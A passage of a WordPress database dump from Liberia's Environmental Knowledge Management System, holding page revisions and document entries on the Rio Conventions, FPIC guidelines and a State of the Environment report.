publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 14:07:15','2021-08-19 14:07:15','',91,'https://ekmsliberia.info/?p=4220',0,'revision','',0),(4223,43,'2021-08-19 14:25:39','2021-08-19 14:25:39','','Bulletins-single-post','','inherit','closed','closed','','4138-revision-v1','','','2021-08-19 14:25:39','2021-08-19 14:25:39','',4138,'https://ekmsliberia.info/?p=4223',0,'revision','',0),(4225,43,'2021-08-19 14:28:42','2021-08-19 14:28:42','','Default Kit','','inherit','closed','closed','','3170-revision-v1','','','2021-08-19 14:28:42','2021-08-19 14:28:42','',3170,'https://ekmsliberia.info/?p=4225',0,'revision','',0),(4226,43,'2021-08-19 14:28:42','2021-08-19 14:28:42','','Default Kit','','inherit','closed','closed','','3170-revision-v1','','','2021-08-19 14:28:42','2021-08-19 14:28:42','',3170,'https://ekmsliberia.info/?p=4226',0,'revision','',0),(4228,43,'2021-08-19 14:36:34','2021-08-19 14:36:34','<h2>Contribute a knowledge resource to the EKMS</h2>\nEkmsliberia.info is managed by the <a style=\"color: #00ccff;\" href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\" target=\"_blank\" rel=\"noopener noreferrer\">Environmental Protection Agency (EPA)</a> of Liberia in collaboration with several partner governmental and other institutions.\n\nWe are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.&nbsp;If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.\n\nThis site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific/peer-review publications, technical documents/reports, policy briefs, educational/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.\n\nTo learn about becoming a member of the EKMS Community, visit our <a href=\"/join-the-community\" target=\"_blank\" rel=\"noopener noreferrer\">‘Join the Community’</a> page.\n\n<a style=\"color: #3366ff;\" href=\"https://ekmsliberia.info/contact-us/\" target=\"_blank\" rel=\"noopener noreferrer\">Contact us</a> if you are interested in contributing to the EKMS!','Contribute','','inherit','closed','closed','','74-revision-v1','','','2021-08-19 14:36:34','2021-08-19 14:36:34','',74,'https://ekmsliberia.info/?p=4228',0,'revision','',0),(4229,43,'2021-08-19 14:36:34','2021-08-19 14:36:34','<h2>Contribute a knowledge resource to the EKMS</h2>\nEkmsliberia.info is managed by the <a style=\"color: #00ccff;\" href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\" target=\"_blank\" rel=\"noopener noreferrer\">Environmental Protection Agency (EPA)</a> of Liberia in collaboration with several partner governmental and other institutions.\n\nWe are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.&nbsp;If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.\n\nThis site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific/peer-review publications, technical documents/reports, policy briefs, educational/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.\n\nTo learn about becoming a member of the EKMS Community, visit our <a href=\"/join-the-community\" target=\"_blank\" rel=\"noopener noreferrer\">‘Join the Community’</a> page.\n\n<a style=\"color: #3366ff;\" href=\"https://ekmsliberia.info/contact-us/\" target=\"_blank\" rel=\"noopener noreferrer\">Contact us</a> if you are interested in contributing to the EKMS!','Contribute','','inherit','closed','closed','','74-revision-v1','','','2021-08-19 14:36:34','2021-08-19 14:36:34','',74,'https://ekmsliberia.info/?p=4229',0,'revision','',0),(4230,43,'2021-08-19 14:36:34','2021-08-19 14:36:34','<h1>Contribute a knowledge resource to the EKMS</h1>		\n		<p>Ekmsliberia.info is managed by the <a style=\"color: #00ccff;\" href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\" target=\"_blank\" rel=\"noopener\">Environmental Protection Agency (EPA)</a> of Liberia in collaboration with several partner governmental and other institutions.</p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia. If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.</p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific/peer-review publications, technical documents/reports, policy briefs, educational/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.</p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\"/join-the-community\" target=\"_blank\" rel=\"noopener\">‘Join the Community’</a> page.</p><p><a style=\"color: #3366ff;\" href=\"https://ekmsliberia.info/contact-us/\" target=\"_blank\" rel=\"noopener\">Contact us</a> if you are interested in contributing to the EKMS!</p>','Contribute','','inherit','closed','closed','','74-revision-v1','','','2021-08-19 14:36:34','2021-08-19 14:36:34','',74,'https://ekmsliberia.info/?p=4230',0,'revision','',0),(4231,43,'2021-08-19 14:41:13','2021-08-19 14:41:13','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMSAre you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"https://ekmsliberia.info/contribute/\">Join here!</a>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n											<a href=\"mailto:contact@ekmsliberia.info\">\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img width=\"600\" height=\"600\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png\" alt=\"\" loading=\"lazy\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-19 14:41:13','2021-08-19 14:41:13','',3805,'https://ekmsliberia.info/?p=4231',0,'revision','',0),(4232,43,'2021-08-19 14:44:05','2021-08-19 14:44:05','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMSAre you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"https://ekmsliberia.info/contribute/\">Join here!</a>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n											<a href=\"mailto:contact@ekmsliberia.info\">\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img width=\"600\" height=\"600\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png\" alt=\"\" loading=\"lazy\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-19 14:44:05','2021-08-19 14:44:05','',3805,'https://ekmsliberia.info/?p=4232',0,'revision','',0),(4234,43,'2021-08-19 14:49:43','2021-08-19 14:49:43','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMSAre you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"https://ekmsliberia.info/contribute/\">Join here!</a>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n											<a href=\"mailto:contact@ekmsliberia.info\">\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img width=\"600\" height=\"600\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png\" alt=\"\" loading=\"lazy\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-19 14:49:43','2021-08-19 14:49:43','',3805,'https://ekmsliberia.info/?p=4234',0,'revision','',0),(4235,43,'2021-08-19 16:53:38','2021-08-19 16:53:38','<h2>Conventions & Protocols</h2>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-768x386.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Learn More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2021-08-19 16:53:38','2021-08-19 16:53:38','',84,'https://ekmsliberia.info/?p=4235',0,'revision','',0),(4236,43,'2021-08-19 16:53:38','2021-08-19 16:53:38','<h2>Conventions & Protocols</h2>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-768x386.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Learn More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2021-08-19 16:53:38','2021-08-19 16:53:38','',84,'https://ekmsliberia.info/?p=4236',0,'revision','',0),(4237,43,'2021-08-19 16:53:38','2021-08-19 16:53:38','<h2>Conventions & Protocols</h2>\n										<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya.png\" alt=\"Nagoya Protocol on Access and Benefits Sharing\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya.png 1024w, https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya-300x151.png 300w, https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya-768x386.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\">Nagoya Protocol on Access and Benefits Sharing</a>The Nagoya Protocol on Access and Benefit sharing was adopted by the Conference of the...<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena.png\" alt=\"Cartagena Protocol on Biosafety to the Convention on Biological Diversity\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena.png 1024w, https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena-300x151.png 300w, https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena-768x386.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\">Cartagena Protocol on Biosafety to the Convention on Biological Diversity</a>The Cartagena Protocol on Biosafety to the Convention on Biological Diversity was adopted by the...<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled.png\" alt=\"Stockholm Convention on Persistent Organic Pollutants\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled.png 1024w, https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled-300x151.png 300w, https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled-768x386.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\">Stockholm Convention on Persistent Organic Pollutants</a>The Stockholm Convention is multilateral environmental agreement to protect human health and the environment from...<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg\" alt=\"United Nations Framework Convention on Climate Change\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-768x386.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-e1618235603738.jpg\" alt=\"United Nations Convention to Combat Desertification\" loading=\"lazy\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Learn More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2021-08-19 16:53:38','2021-08-19 16:53:38','',84,'https://ekmsliberia.info/?p=4237',0,'revision','',0),(4238,38,'2021-09-23 11:22:54','2021-09-23 11:22:54','This State of the Environment Report (SoER), drafted by Green Consultancy Inc. (Greencons), considers three essential country resources (or themes) which can be used for assessing Liberia’s environmental state and trends.\r\n\r\nThey are: Terrestrial Resources (forestry, soil, etc.); Aquatic Resources; and Cross-Sectional Resources and Environmental Linkages. Towards the end of the report, additional emerging environmental issues and concerns are also discussed. These include, for example, human trafficking, climate change, Invasive Alien Species (IAS), illegal fishing, the usage of chemicals and solid waste management. The methodology for drafting the report largely involved a public notification period, a questionnaire which was administered by Greencons to a range of stakeholders across Liberia, site assessments and strategic sampling, Focus Group Discussions (FGDs), and Key Informant Interviews (KIIs).','STATE OF THE ENVIRONMENT REPORT FOR LIBERIA','','publish','closed','closed','','state-of-the-environment-report-for-liberia','','','2021-09-23 11:22:54','2021-09-23 11:22:54','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4238',90,'document','',0),(4240,38,'2021-08-20 09:05:47','0000-00-00 00:00:00','Free, Prior and Informed Consent (FPIC) is established in Liberian law and practice. It is a way to protect the rights of communities by involving them in decisions about developments that affects land or resources where they live.This is a report on the development of National Guidelines for FPIC, under contract to the Environmental Protection Agency and under the auspices of the Liberian Forestry Sector Project, run by the Forestry Development Authority with support from The World Bank and funding from the Government of Norway.\nFPIC is most prominent and defined in the forestry sector, but it has a wider purpose as a means of protecting community rights and upholding the participation of Liberian citizens in decisions about the use of land and resources.\n\nAs Liberia goes down the path of strengthening community rights to land and resources, the right of communities to give or withhold consent to developments that affect their assets will expand and with it the importance of FPIC as a process for reaching agreements between developers and communities.FPIC has a firm legal basis in Liberian laws and regulations, although this is limited to certain sectors and activities. The Guidelines developed in this report are grounded in these laws and give clarity to the FPIC requirements in forestry, environment and land rights legislation. But the aim is also to develop Guidelines that will be suitable for the wider application of FPIC that is introduced by the recent Liberian Land Rights Act and is likely to arise from future developments of national law and regulation. The Government and nongovernment bodies that contributed to the development of the guidelines at consultation meetings were clear\nthat FPIC was relevant across sectors, and across government. ‘FPIC is everyone’s business’, as one\nparticipant said.','Development  of National  Guidelines on Free,  Prior and Informed  Consent (FPIC)','','draft','closed','closed','','','','','2021-08-20 09:05:47','2021-08-20 09:05:47','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4240',89,'document','',0),(4241,38,'2021-08-20 09:07:58','2021-08-20 09:07:58','','PFIC','','inherit','open','closed','','pfic','','','2021-08-20 09:07:58','2021-08-20 09:07:58','',4240,'https://ekmsliberia.info/wp-content/uploads/2021/08/PFIC.png',0,'attachment','image/png',0),(4242,38,'2021-08-20 09:18:02','2021-08-20 09:18:02','','D7 Final Report_compressed','','inherit','open','closed','','d7-final-report_compressed','','','2021-08-20 09:18:02','2021-08-20 09:18:02','',4240,'https://ekmsliberia.info/wp-content/uploads/2021/08/D7-Final-Report_compressed.pdf',0,'attachment','application/pdf',0),(4243,42,'2021-08-23 09:56:08','2021-08-23 09:56:08','This is a SWOT Analysis of Liberia’s Natural Resources Management Environmental Policy Framework','A SWOT Analysis of Liberia’s Natural Resources Management Environmental Policy Framework','','inherit','closed','closed','','1747-revision-v1','','','2021-08-23 09:56:08','2021-08-23 09:56:08','',1747,'https://ekmsliberia.info/?p=4243',0,'revision','',0),(4244,42,'2021-08-23 10:15:49','2021-08-23 10:15:49','The consultancy aims to examine the awareness level among Liberians (public, institutions and organizations and rural settlers), to evaluate the weaknesses and strengths of the current environmental awareness, and to suggests a plan that is likely to raise the level of environmental awareness in the full contexts climate change, biological conservation and land degradation. A review of previous related surveys is also required amongst a survey of the public, institutions, individuals and other relevant groups. Due to the importance of the environment in Liberia, and its connotations to socioeconomic development in general, and rural livelihoods in particular, this survey should contribute towards enhancing the national framework related to enhancing of biodiversity, climate change and land degradation awareness among individuals. The survey should utilize primary data collected through structured survey questionnaires. A random sample of professionals in institutions to test their awareness in the fields of climate change, biological conservation and land degradation.\n\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-ASSESSMENT-PUBLIC-AWARENESS-OF-RIO-CONVENTIONS-IMPLEMENTATIONS.docx\">https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-ASSESSMENT-PUBLIC-AWARENESS-OF-RIO-CONVENTIONS-IMPLEMENTATIONS.docx</a>','Request for Expression of Interest: A Survey to Assess Public Awareness of the Importance of the RIO Conventions','','inherit','closed','closed','','3790-autosave-v1','','','2021-08-23 10:15:49','2021-08-23 10:15:49','',3790,'https://ekmsliberia.info/?p=4244',0,'revision','',0),(4245,42,'2021-08-23 10:06:22','2021-08-23 10:06:22','','CCCD ASSESSMENT PUBLIC AWARENESS OF RIO CONVENTIONS IMPLEMENTATIONS','','inherit','open','closed','','cccd-assessment-public-awareness-of-rio-conventions-implementations','','','2021-08-23 10:06:22','2021-08-23 10:06:22','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-ASSESSMENT-PUBLIC-AWARENESS-OF-RIO-CONVENTIONS-IMPLEMENTATIONS.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(4246,42,'2021-08-23 10:06:24','2021-08-23 10:06:24','','CCCD THEMATIC ASSESSMENT NCSA','','inherit','open','closed','','cccd-thematic-assessment-ncsa','','','2021-08-23 10:06:24','2021-08-23 10:06:24','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-THEMATIC-ASSESSMENT-NCSA.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(4247,42,'2021-08-23 10:06:26','2021-08-23 10:06:26','','CCCD PROJET CHIEF TECHNICAL ADVISOR','','inherit','open','closed','','cccd-projet-chief-technical-advisor','','','2021-08-23 10:06:26','2021-08-23 10:06:26','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-PROJET-CHIEF-TECHNICAL-ADVISOR.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(4248,42,'2021-08-23 